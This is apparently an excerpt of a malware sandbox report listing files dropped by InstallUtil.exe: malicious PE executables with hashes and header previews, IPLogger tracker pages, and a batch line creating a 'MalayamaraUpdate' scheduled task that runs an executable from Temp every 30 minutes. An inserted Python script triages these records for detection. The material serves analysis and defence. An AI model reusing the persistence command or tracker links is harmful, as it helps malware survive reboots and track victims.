                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):129
                                                                                                                          Entropy (8bit):4.809875578583948
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:HFUuvaOpLKBchEXEtTC5WAuUkh4E2J5xAIEyrKBySKFS3:Ogas7SXEFAu923faKS3
                                                                                                                          MD5:A60AD3B864BC5B7F3BC6056968D8343B
                                                                                                                          SHA1:308D6F187B22DDCA1F6328F799EF62E1C505FF61
                                                                                                                          SHA-256:9FA192F23FAB9E060AA78499C4B77D7479504903DF0B4B5C458F699FFBDB7CB5
                                                                                                                          SHA-512:9A59F89C404CAF5EAD1DC8127F1AA62083BD5324C8E111E3A8724C6427E83E05980FF7197F919A787E7DD66B08EE41C962B97A5DF9B6A771C3E7084289548133
                                                                                                                          Malicious:false
                                                                                                                          Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4283784
                                                                                                                          Entropy (8bit):7.981853182461957
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                          MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                          SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                          SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                          SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.768475714302623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:enSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:tWqlkLESgCRE/vhOjb05efd6e/oXHA
                                                                                                                          MD5:918151F14C10B6BB7533F6D97BF22D2D
                                                                                                                          SHA1:7B058C97929435886B28D658736BEBA993C7EA8F
                                                                                                                          SHA-256:7F4DF608DB59F2B9337C532B756AA885D4670A314339BCE35CD1D14106F73763
                                                                                                                          SHA-512:F05BB8A50AFA5E7D070D31CA1A57C3A15B1EE3927F16AB6FE27FBAE6AC9B5A0BE5484DB17BD5459E4ED02D3769C19B16B3CAE37E9A4DA0317E94374F5DFF05DC
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......r-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1956920
                                                                                                                          Entropy (8bit):7.99369020397791
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:49152:C9wV5EQOw+7MS5M5jPezvsHgBbanIh7CfEfd8Xzi4Wm:MwUQOzr5M57oUibanIkfEfqDiu
                                                                                                                          MD5:17B5157E8F35F33EB2325EE5751BCF3B
                                                                                                                          SHA1:2432F8F65BEC3540FE8C645092AB70C45524B02B
                                                                                                                          SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
                                                                                                                          SHA-512:50931F42899213D6549E69DCBBAB5F0B266010930BAD37125D392195E5A24579D6DBDA79AD9AAFE6044333F2B7835F8DBDDFC5B4198B5C097A275ED3C69A7C74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
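The records above (the schtasks line in the batch-file preview at the top, and the dropped-file entries with their file types, entropies and hashes) can be triaged mechanically rather than read one at a time. The following Python is an added example; it is not code from the Joe Sandbox report or from any of the detected malware families. It assumes the Key:Value layout used in this listing, a constructed RECORDS excerpt whose hashes and entropies are copied from the report but whose previews are shortened, an entropy threshold of 7.9 and a browser-process list that are both assumptions, and rule names chosen here for illustration. It de-duplicates by SHA-256, tags the packer from the File Type text or the DOS stub (NSIS, UPX, the MZP Borland/Delphi stub), flags near-8-bit-entropy PE files, flags HTML content written by a non-browser process (the expired-dropper pattern, where the payload URL now serves a tracker landing page), and parses the scheduled-task persistence command.

```python
import re
from collections import Counter

# Added example, not report code. Constructed excerpt of the listing: hashes
# and entropies copied from the report, previews cut down to what the rules inspect.
RECORDS = r"""
Preview:chcp 1251.. schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F..
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Entropy (8bit):5.422209848736349
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
Preview:<!DOCTYPE html>.<html lang="" class="html">..<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" />
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.982011327302058
SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
Preview:MZ......................@........!..L.!This program cannot be run in DOS mode....$.......PE..L
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):7.982011327302058
SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
Preview:MZ......................@........!..L.!This program cannot be run in DOS mode....$.......PE..L
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):7.768475714302623
SHA-256:7F4DF608DB59F2B9337C532B756AA885D4670A314339BCE35CD1D14106F73763
Preview:MZx.....................@.......x...........!..L.!This program cannot be run in DOS mode.$..PE..L
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.99369020397791
SHA-256:B81490ECECB4BA976D2B5B095B0574042547E341F465EF4574AFC3DA9544EC1A
Preview:MZP.....................@........!..L.!..This program must be run under Win32..$7
"""

PACKED_ENTROPY = 7.9  # assumed threshold: this close to 8 bits/byte means compressed or encrypted
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}  # assumed browser list
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.I)


def parse_records(text):
    """One dict per record; 'Process:' opens a record, and lines before the
    first one (the batch-file tail at the top) form a headless record."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)  # values (paths, URLs) contain colons too
        if key == "Process" or cur is None:
            cur = {}
            records.append(cur)
        cur[key] = value
    return records


def parse_schtasks(cmd):
    """Return {tn, tr, sc, mo} from a 'schtasks /create' line, or None."""
    m = re.search(r"schtasks\s+/create\b(.*)", cmd, re.I)
    if not m:
        return None
    opts = {}
    for name in ("tn", "tr", "sc", "mo"):
        om = re.search(rf'/{name}\s+(?:"([^"]*)"|(\S+))', m.group(1), re.I)
        if om:  # strip the inner single quotes the dropper wraps around /tr
            opts[name] = (om.group(1) if om.group(1) is not None else om.group(2)).strip("'")
    return opts


def packer_tag(rec):
    """Packer/linker family from libmagic's File Type or the DOS stub text."""
    ftype, preview = rec.get("File Type", ""), rec.get("Preview", "")
    if "Nullsoft Installer" in ftype:
        return "nsis"
    if "UPX" in ftype:
        return "upx"
    if preview.startswith("MZP") and "run under Win32" in preview:
        return "borland-delphi-stub"  # MZP plus that string is the Borland/Delphi linker stub
    return None


def triage(records):
    """List of (rule, subject, detail) findings over the parsed records."""
    findings = []
    counts = Counter(r["SHA-256"] for r in records if "SHA-256" in r)
    for sha, n in counts.items():
        if n > 1:  # identical content listed more than once
            findings.append(("duplicate-drop", sha, f"listed {n} times"))
    for r in records:
        sha, ftype = r.get("SHA-256", "-"), r.get("File Type", "")
        tag = packer_tag(r)
        if tag:
            findings.append(("packer", sha, tag))
        if ftype.startswith("PE32") and float(r.get("Entropy (8bit)", "0")) >= PACKED_ENTROPY:
            findings.append(("high-entropy-pe", sha, r["Entropy (8bit)"]))
        proc = r.get("Process", "").rsplit("\\", 1)[-1].lower()
        if ftype.startswith("HTML document") and proc and proc not in BROWSERS:
            findings.append(("html-from-non-browser", sha, proc))  # payload URL now serves a web page
        task = parse_schtasks(r.get("Preview", ""))
        if task:
            where = "temp-dir" if TEMP_DIR.search(task.get("tr", "")) else "other"
            findings.append(("schtasks-persistence", task.get("tn"), f"{task.get('sc')}/{task.get('mo')} {where}"))
    return findings


if __name__ == "__main__":
    for rule, subject, detail in triage(parse_records(RECORDS)):
        print(f"{rule:22} {subject} {detail}")
```

On the excerpt this yields one duplicate-drop finding for the NSIS archive, packer tags for the NSIS, UPX and Delphi-stub files, high-entropy flags for the NSIS archive and the Delphi-stub file (the UPX file sits just under the threshold), one HTML-from-InstallUtil.exe finding for the IPLogger page, and the MalayamaraUpdate task running every 30 minutes from the user's Temp directory. The same parser can be pointed at the full listing once the per-file path lines are restored, which is where the duplicate-drop rule becomes a list of the paths one artifact was written to.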
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4283784
                                                                                                                          Entropy (8bit):7.981853182461957
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
                                                                                                                          MD5:F0A6999F1BC47C6C468CF6DB95003AD5
                                                                                                                          SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
                                                                                                                          SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
                                                                                                                          SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):7446
                                                                                                                          Entropy (8bit):5.422209848736349
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                          MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                          SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                          SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                          SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                          Malicious:false
                                                                                                                          Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.76847572306794
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:tnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHS:EWqlkLESgCRE/vhOjb05efd6e/oXHS
                                                                                                                          MD5:F5F08291B2237B4B9F06EC773F832097
                                                                                                                          SHA1:36EEC8A57430D96715325ECEB51D89FBB0FA2E6B
                                                                                                                          SHA-256:6998173E548E3563A7EF620CE6D7F23B16DC13D59B9C1CA555B7B5FBF602B2B7
                                                                                                                          SHA-512:6DCDA22E53129C724EAE243599756E070B48CA5CA9729013F055C51D52FBD273C669D8F830C8F53CB54F8A81785E3DABDAE14B505782CC635BF7673C504689BC
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......5-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):175104
                                                                                                                          Entropy (8bit):6.135102131058025
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:NgwOgWt4Ye0EQl4HpEQP0gflpnK9O3IC:OVtZEQepEQBpK9mX
                                                                                                                          MD5:89B400AF781E7D55812A77260DC1D9C8
                                                                                                                          SHA1:36A6D8C05D2B0C3BF32B677EBC01A57580A83C69
                                                                                                                          SHA-256:04E73AC7621BA31180A21AA5515F6E3455D40C7B6046CEEFA77ADADB45D5B33F
                                                                                                                          SHA-512:AEF229FAD4F8BDB5D7D9E4CAAAE708CC05618C2FCC534BB3F266AB60DBEB976C95D217190BBBB3BDBD121206CB4A5EA49939D3A546D7469330B36FA5F6F03711
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L......d............................}.............@..........................@.......0......................................|...(........x..............................................................................L............................text............................... ..`.rdata..>o.......p..................@..@.data...@.... ...(..................@....rsrc....x.......z...2..............@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
